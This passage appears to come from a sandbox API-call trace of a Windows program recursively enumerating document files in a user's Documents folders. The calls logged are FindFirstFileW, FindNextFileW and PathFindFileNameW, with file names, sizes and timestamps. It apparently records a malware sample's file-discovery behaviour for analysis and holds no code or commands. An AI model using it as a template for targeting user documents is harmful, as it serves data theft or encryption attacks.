cFileName="zriGIP8fdoRa Uq06Xv.avi", cAlternateFileName="ZRIGIP~1.AVI")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536ad7f0, ftCreationTime.dwHighDateTime=0x1d5e25b, ftLastAccessTime.dwLowDateTime=0xaff2e680, ftLastAccessTime.dwHighDateTime=0x1d5e098, ftLastWriteTime.dwLowDateTime=0xaff2e680, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0x0, nFileSizeLow=0x1a39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zriGIP8fdoRa Uq06Xv.avi", cAlternateFileName="ZRIGIP~1.AVI")) returned 0 [0143.008] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0143.008] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78KUspWVJZetkP\\") returned="78KUspWVJZetkP\\" [0143.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.008] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.009] PathFindFileNameW (pszPath="") returned="" [0143.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78KUspWVJZetkP\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b4ac50, ftCreationTime.dwHighDateTime=0x1d5dc3d, ftLastAccessTime.dwLowDateTime=0x3d9ca5f0, ftLastAccessTime.dwHighDateTime=0x1d5e523, ftLastWriteTime.dwLowDateTime=0x3d9ca5f0, ftLastWriteTime.dwHighDateTime=0x1d5e523, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6818f8 | out: hHeap=0x620000) returned 1 [0143.009] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b4ac50, ftCreationTime.dwHighDateTime=0x1d5dc3d, ftLastAccessTime.dwLowDateTime=0x3d9ca5f0, ftLastAccessTime.dwHighDateTime=0x1d5e523, ftLastWriteTime.dwLowDateTime=0x3d9ca5f0, ftLastWriteTime.dwHighDateTime=0x1d5e523, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.009] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1670d990, ftCreationTime.dwHighDateTime=0x1d5dbac, ftLastAccessTime.dwLowDateTime=0x931384b0, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0x931384b0, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x12f56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LfMb6C8td9-lzRuXkVMt.odp", cAlternateFileName="LFMB6C~1.ODP")) returned 1 [0143.009] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45da640, ftCreationTime.dwHighDateTime=0x1d5db37, ftLastAccessTime.dwLowDateTime=0x3ce9fe70, ftLastAccessTime.dwHighDateTime=0x1d5dc75, ftLastWriteTime.dwLowDateTime=0x3ce9fe70, ftLastWriteTime.dwHighDateTime=0x1d5dc75, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PSvjyQUxfFa2Fyf4 2u", cAlternateFileName="PSVJYQ~1")) returned 1 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bc38 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bd88 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326be30 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326bd88 | out: hHeap=0x620000) returned 1 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326bc38 | out: hHeap=0x620000) returned 1 [0143.009] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95c7d820, ftCreationTime.dwHighDateTime=0x1d5dc0f, ftLastAccessTime.dwLowDateTime=0x86d65390, ftLastAccessTime.dwHighDateTime=0x1d5e5fc, ftLastWriteTime.dwLowDateTime=0x86d65390, ftLastWriteTime.dwHighDateTime=0x1d5e5fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="py4bxoRItwQEqgn-yZ", cAlternateFileName="PY4BXO~1")) returned 1 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bc38 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bd88 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x3282668 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281200 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x6818f8 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281110 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5c8 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bed8 [0143.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326bf80 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281188 | out: hHeap=0x620000) returned 1 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6817e8 | out: hHeap=0x620000) returned 1 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e108 | out: hHeap=0x620000) returned 1 [0143.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326bce0 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326be30 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3203a90 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x326be30 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326bd88 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x326bc38 | out: hHeap=0x620000) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5713baf0, ftCreationTime.dwHighDateTime=0x1d5e1c7, ftLastAccessTime.dwLowDateTime=0x98628fe0, ftLastAccessTime.dwHighDateTime=0x1d5e1a4, ftLastWriteTime.dwLowDateTime=0x98628fe0, ftLastWriteTime.dwHighDateTime=0x1d5e1a4, nFileSizeHigh=0x0, nFileSizeLow=0x1a78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sMH2uT9b0-WPcje8tW.pps", cAlternateFileName="SMH2UT~1.PPS")) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d3faa50, ftCreationTime.dwHighDateTime=0x1d5e156, ftLastAccessTime.dwLowDateTime=0x2e4453b0, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x2e4453b0, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0xeeb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ulLXobn yYSIsB.docx", cAlternateFileName="ULLXOB~1.DOC")) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e51b770, ftCreationTime.dwHighDateTime=0x1d5e6f2, ftLastAccessTime.dwLowDateTime=0x73ecab0, ftLastAccessTime.dwHighDateTime=0x1d5e677, ftLastWriteTime.dwLowDateTime=0x73ecab0, ftLastWriteTime.dwHighDateTime=0x1d5e677, nFileSizeHigh=0x0, nFileSizeLow=0x136a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WzqPO.csv", cAlternateFileName="")) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e51b770, ftCreationTime.dwHighDateTime=0x1d5e6f2, ftLastAccessTime.dwLowDateTime=0x73ecab0, ftLastAccessTime.dwHighDateTime=0x1d5e677, ftLastWriteTime.dwLowDateTime=0x73ecab0, ftLastWriteTime.dwHighDateTime=0x1d5e677, nFileSizeHigh=0x0, nFileSizeLow=0x136a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WzqPO.csv", cAlternateFileName="")) returned 0 [0143.010] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3280a80 [0143.010] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281098 | out: hHeap=0x620000) returned 1 [0143.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0143.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ix26jPfYt\\") returned="Ix26jPfYt\\" [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.011] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.011] PathFindFileNameW (pszPath="") returned="" [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ix26jPfYt\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe945e790, ftCreationTime.dwHighDateTime=0x1d5d93e, ftLastAccessTime.dwLowDateTime=0xc6010890, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0xc6010890, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe945e790, ftCreationTime.dwHighDateTime=0x1d5d93e, ftLastAccessTime.dwLowDateTime=0xc6010890, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0xc6010890, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a3dfb0, ftCreationTime.dwHighDateTime=0x1d5df76, ftLastAccessTime.dwLowDateTime=0xbe97aac0, ftLastAccessTime.dwHighDateTime=0x1d5dee7, ftLastWriteTime.dwLowDateTime=0xbe97aac0, ftLastWriteTime.dwHighDateTime=0x1d5dee7, nFileSizeHigh=0x0, nFileSizeLow=0x1231a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aZjZJDiBeGXFq.pdf", cAlternateFileName="AZJZJD~1.PDF")) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530014e0, ftCreationTime.dwHighDateTime=0x1d5e32f, ftLastAccessTime.dwLowDateTime=0x72b79e40, ftLastAccessTime.dwHighDateTime=0x1d5e28d, ftLastWriteTime.dwLowDateTime=0x72b79e40, ftLastWriteTime.dwHighDateTime=0x1d5e28d, nFileSizeHigh=0x0, nFileSizeLow=0x13476, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CHrPnN.odt", cAlternateFileName="")) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf22fa2e0, ftCreationTime.dwHighDateTime=0x1d5e520, ftLastAccessTime.dwLowDateTime=0xd33e6340, ftLastAccessTime.dwHighDateTime=0x1d5e7d1, ftLastWriteTime.dwLowDateTime=0xd33e6340, ftLastWriteTime.dwHighDateTime=0x1d5e7d1, nFileSizeHigh=0x0, nFileSizeLow=0x1278b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cKKgx9YbNf.odt", cAlternateFileName="CKKGX9~1.ODT")) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62cc4580, ftCreationTime.dwHighDateTime=0x1d5e418, ftLastAccessTime.dwLowDateTime=0x764d9460, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0x764d9460, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f9LC5 KB4-0fHuzc", cAlternateFileName="F9LC5K~1")) returned 1 [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e108 [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e790 [0143.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e828 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff4e3070, ftCreationTime.dwHighDateTime=0x1d5db18, ftLastAccessTime.dwLowDateTime=0x2ca03ab0, ftLastAccessTime.dwHighDateTime=0x1d5d7ad, ftLastWriteTime.dwLowDateTime=0x2ca03ab0, ftLastWriteTime.dwHighDateTime=0x1d5d7ad, nFileSizeHigh=0x0, nFileSizeLow=0xba7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O1YU.odt", cAlternateFileName="")) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682d8d00, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0xe194b120, ftLastAccessTime.dwHighDateTime=0x1d5dfc4, ftLastWriteTime.dwLowDateTime=0xe194b120, ftLastWriteTime.dwHighDateTime=0x1d5dfc4, nFileSizeHigh=0x0, nFileSizeLow=0x16d4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pdr3 Xxpt8.pps", cAlternateFileName="PDR3XX~1.PPS")) returned 1 [0143.012] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa09a47e0, ftCreationTime.dwHighDateTime=0x1d5d90f, ftLastAccessTime.dwLowDateTime=0x1a23a140, ftLastAccessTime.dwHighDateTime=0x1d5e4d4, ftLastWriteTime.dwLowDateTime=0x1a23a140, ftLastWriteTime.dwHighDateTime=0x1d5e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x266c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T3tO51ONBdzJ.doc", cAlternateFileName="T3TO51~1.DOC")) returned 1 [0143.012] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864e6be0, ftCreationTime.dwHighDateTime=0x1d5de1a, ftLastAccessTime.dwLowDateTime=0x771497c0, ftLastAccessTime.dwHighDateTime=0x1d5dd53, ftLastWriteTime.dwLowDateTime=0x771497c0, ftLastWriteTime.dwHighDateTime=0x1d5dd53, nFileSizeHigh=0x0, nFileSizeLow=0x8321, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TBr9hidwY.docx", cAlternateFileName="TBR9HI~1.DOC")) returned 1 [0143.012] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77601800, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x58c7b010, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0x58c7b010, ftLastWriteTime.dwHighDateTime=0x1d5e215, nFileSizeHigh=0x0, nFileSizeLow=0xbe66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zgxcG09fQGwRsg6F39.rtf", cAlternateFileName="ZGXCG0~1.RTF")) returned 1 [0143.012] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77601800, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x58c7b010, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0x58c7b010, ftLastWriteTime.dwHighDateTime=0x1d5e215, nFileSizeHigh=0x0, nFileSizeLow=0xbe66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zgxcG09fQGwRsg6F39.rtf", cAlternateFileName="ZGXCG0~1.RTF")) returned 0 [0143.012] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.012] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.012] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ljrmjeDV\\") returned="ljrmjeDV\\" [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.012] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.012] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.012] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.012] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.012] PathFindFileNameW (pszPath="") returned="" [0143.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ljrmjeDV\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527be600, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0xab1f5e30, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xab1f5e30, ftLastWriteTime.dwHighDateTime=0x1d5e3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.012] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527be600, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0xab1f5e30, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xab1f5e30, ftLastWriteTime.dwHighDateTime=0x1d5e3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc563dd80, ftCreationTime.dwHighDateTime=0x1d5d913, ftLastAccessTime.dwLowDateTime=0xb1c93060, ftLastAccessTime.dwHighDateTime=0x1d5dd67, ftLastWriteTime.dwLowDateTime=0xb1c93060, ftLastWriteTime.dwHighDateTime=0x1d5dd67, nFileSizeHigh=0x0, nFileSizeLow=0xa6f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D41U.pps", cAlternateFileName="")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda04f90, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xd797dfa0, ftLastAccessTime.dwHighDateTime=0x1d5de8c, ftLastWriteTime.dwLowDateTime=0xd797dfa0, ftLastWriteTime.dwHighDateTime=0x1d5de8c, nFileSizeHigh=0x0, nFileSizeLow=0xbab7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GmwZ3z-2JG_3G.ots", cAlternateFileName="GMWZ3Z~1.OTS")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f9780, ftCreationTime.dwHighDateTime=0x1d5d7aa, ftLastAccessTime.dwLowDateTime=0xd60e1cf0, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0xd60e1cf0, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x18cb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IsQZB.docx", cAlternateFileName="ISQZB~1.DOC")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0366cb0, ftCreationTime.dwHighDateTime=0x1d5dbbe, ftLastAccessTime.dwLowDateTime=0x99559dd0, ftLastAccessTime.dwHighDateTime=0x1d5d861, ftLastWriteTime.dwLowDateTime=0x99559dd0, ftLastWriteTime.dwHighDateTime=0x1d5d861, nFileSizeHigh=0x0, nFileSizeLow=0x17a96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YJQrGibZK7snyZpChIoG.ods", 